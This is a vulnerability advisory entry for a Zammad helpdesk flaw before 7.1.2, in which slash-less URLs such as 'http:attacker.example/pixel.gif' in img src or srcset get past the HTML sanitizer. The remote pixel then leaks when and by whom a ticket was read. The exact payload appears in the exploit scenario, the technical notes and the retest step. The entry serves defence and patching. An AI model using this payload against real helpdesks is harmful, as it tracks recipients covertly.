| Exploitation Conditions | No authentication or special configuration is required to deliver the payload - any external party can send an email or open a ticket, since the sanitizer runs on all ticket/email article HTML in Zammad < 7.1.2 by default. Exploitation is LIMITED by required user interaction (UI:P): a recipient - typically an agent viewing the ticket article or email view in the browser - must open the crafted content for the pixel to load. The payload must use the slash-less scheme form (e.g. src or srcset = 'http:attacker.example/pixel.gif') to evade the pre-7.1.2 unsafe_link_protocol? check; standard 'http://' URLs are already blocked. Impact is bounded to disclosing read-receipt metadata (open time, recipient IP/User-Agent), not article contents or credentials. |
| Impact | This is a genuine but low-severity information-disclosure flaw, not a high-impact issue. The NVD CVSS 4.0 vector (5.3, AV:N/AC:L/AT:N/PR:N/UI:P/VC:L, all other impacts N) is internally consistent with the description: an unauthenticated remote attacker sends a crafted email/ticket, and disclosure is limited (VC:L) to metadata - when and by whom the ticket was opened - via a silently-loaded remote tracking pixel. There is no integrity or availability impact, and no code execution. No EPSS score, KEV listing, or public POC was provided, so this is not confirmed to be exploited; the fix commit (a5878f37) publicly discloses the exact bypass payload (http:host without slashes), which lowers the bar to reproduce but is not the same as active exploitation. Overall this is a realistic bug-bounty-class privacy/tracking-pixel bypass rather than an urgent patch priority: real risk is bounded by the requirement that a recipient (typically an agent) open the malicious content, and the only reward to the attacker is read-receipt-style metadata. The 'Authentication Bypass' tag conflicts with the actual mechanism - nothing about authentication is bypassed; the sanitizer's remote-content blocker is bypassed to leak metadata. |
| Exploit ScenarioDerived | An attacker emails the helpdesk (or opens a ticket) containing an <img> whose src or srcset uses the slash-less form 'http:attacker.example/pixel.gif'. Zammad's sanitizer fails to recognize this as a remote URL, so it strips no content and shows no 'remote content blocked' warning; when an agent opens the ticket, their browser silently fetches the pixel, revealing to the attacker the agent's IP/User-Agent and exactly when the ticket was read. No public exploit code was identified, but the fixing commit discloses the exact payload format. |

Alert meAnalysisAIv1 – Sep 25, 2026
Information disclosure in the Zammad helpdesk/customer support system versions prior to 7.1.2 allows a remote, unauthenticated party to embed a tracking pixel that evades the built-in HTML sanitizer, so that when an agent views the crafted ticket or email the recipient's browser silently loads an external image and leaks read-receipt metadata such as when and by whom the ticket was opened. Exploitation requires the recipient to open the article in a browser (CVSS 4.0 base score 5.3; independently assessed as CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N), and impact is bounded to open-time and viewer-fingerprint disclosure rather than ticket contents, credentials, or code execution. No public exploit code has been identified at time of analysis and the CVE is not in CISA KEV; the vendor-released fix is version 7.1.2.
RemediationAI
Vendor-released patch: upgrade to Zammad 7.1.2, which contains the sanitizer correction (commit a5878f37e4010f0b3bec85dae35af964cc1c8019) widening the remote-protocol check from 'http://'/'https://'/'ftp://'/'//' to 'http:'/'https:'/'ftp:'/'//', and confirm the upgrade by re-testing that '<img src="http:attacker.example/pixel.gif">' and the srcset/http:/https: variants are stripped and that scrubber.remote_content_removed flips to true; details are in the advisory https://github.com/zammad/zammad/security/advisories/GHSA-fpwp-w2p4-hqg7. If upgrading immediately is not possible, apply compensating controls that are honest about their trade-offs: deploy a Content-Security-Policy on the Zammad origin with img-src restricted to 'self' and trusted image hosts, which stops outbound pixel loads but will also break legitimately embedded external images and any CDN-hosted assets until the allowlist is tuned; block outbound HTTP/S image fetches to untrusted destinations at the egress proxy or firewall, which limits exfiltration of the read-receipt beacon but can disrupt other integrations and must be maintained as an allowlist; and instruct agents to review tickets with remote content disabled or with a mail client/plugin that blocks external images, which reduces exposure at the cost of degraded rendering of legitimate HTML email. Because the residual impact is only open-time/viewer-fingerprint disclosure, these controls are proportionate stopgaps rather than substitutes for the 7.1.2 upgrade; there is no separate configuration switch in Zammad < 7.1.2 that fully closes the slash-less scheme gap.

Technical ContextAI · show details
Zammad sanitizes ticket and email article HTML through a scrubber implemented in lib/html_sanitizer/scrubber/wipe.rb. Its remote-content check, unsafe_link_protocol?, matched only the literal prefixes 'http://', 'https://', 'ftp://' and '//' (CWE-20: improper input validation, an allowlist/denylist normalization gap). Browsers, however, resolve the slash-less scheme-only form as a remote URL by scheme resolution, so an attribute such as src or srcset = 'http:attacker.example/pixel.gif' (or the https: equivalent) is treated as an external resource while the sanitizer fails to classify it as remote; consequently the 'remote content blocked' warning is never raised and scrubber.remote_content_removed stays false. The upstream fix in commit a5878f37e4010f0b3bec85dae35af964cc1c8019 changes the check to string.downcase.start_with?('http:', 'https:', 'ftp:', '//') and adds specs asserting that both img src/srcset with 'http:' and 'https:' scheme-only forms are wiped and flagged as removed remote content. Because the flaw sits in the shared sanitizer, it applies to all article HTML rendering paths in Zammad < 7.1.2, which handles image tags in both src and srcset attributes. Note that the supplied tags label this 'Authentication Bypass'; the authoritative independent assessment treats it strictly as a low-severity information-disclosure/tracking issue with UI:R, and no authentication or authorisation control is actually bypassed.

1DescriptionCVE.org
Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, zammad's HTML sanitizer, which blocks remote images in ticket articles and email views, can be bypassed using a shortened URL format that omits the double slash after the scheme (for example a shortened HTTP URL instead of a shortened HTTP URL). Modern browsers treat both forms as equivalent remote URLs. As a result, an attacker who sends a crafted email or ticket can cause the recipient's browser to silently load an image from an external server, revealing when and by whom the ticket was opened. Zammad's "remote content blocked" warning is not shown because the sanitizer does not recognize the shortened form as remote. This issue is fixed in version 7.1.2.
